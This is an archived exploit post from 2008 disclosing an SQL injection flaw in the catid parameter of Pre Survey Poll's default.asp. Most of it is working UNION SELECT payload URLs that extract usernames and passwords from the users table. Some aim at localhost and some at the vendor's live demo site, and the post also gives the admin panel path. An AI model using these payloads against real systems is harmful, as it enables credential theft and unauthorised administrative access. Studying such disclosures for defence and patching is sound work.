Pre Survey Poll (default.asp catid) SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Pre Survey Poll (default.asp catid) SQL Injection Vulnerability
# Published : 2008-07-22
# Author : DreamTurk
# Previous Title : Maian Greetings 2.1 Insecure Cookie Handling Vulnerability
# Next Title : DigiLeave 1.2 (info_book.asp book_id) Blind SQL Injection Exploit

PRE SURVEY POLL Remote Sql Injection
DreamTurk / sqL Lov3r'Z Crew Co. 2008
Downlod: http://www.preproject.com/poll.asp / Price $28.00
Demo : http://www.preproject.com/poll/default.asp
Sql :
http://localhost/patch/default.asp?catid=1+union+select+0,username+from+users
http://localhost/patch/default.asp?catid=1+union+select+0,username+from+users

Admin Panel :
http://localhost/patch/admin/default.asp
Greatz : aLL My Friend'Z and str0ke

========================================From Turkey=============================================
Demo Page ;
 http://www.preproject.com/poll/default.asp?catid=1+union+select+0,password+from+users

 http://www.preproject.com/poll/default.asp?catid=1+union+select+0,password+from+users

# www.Syue.com [2008-07-22]